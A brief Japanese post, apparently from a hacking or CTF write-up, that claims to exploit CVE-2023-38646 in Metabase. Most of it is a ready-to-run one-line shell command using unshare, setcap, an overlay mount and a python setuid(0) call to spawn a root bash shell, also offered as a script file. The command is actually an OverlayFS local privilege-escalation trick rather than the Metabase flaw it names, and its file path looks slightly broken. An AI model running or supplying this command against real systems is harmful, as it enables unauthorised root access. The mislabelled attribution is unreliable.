
Metabase における CVE-2023-38646 のエクスプロイト。unshare および setuid 技術を介してリモートコード実行と root への権限昇格を実現します。
上記の情報に基づいて、マシンまたはシステムのrootユーザーを取得するには、このコマンドとファイルでrootユーザーになります。
このコマンドを直接実行するか、ファイルとして実行できます。 コマンド: $unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'
実行ファイル: $./exploitsh.sh
やった!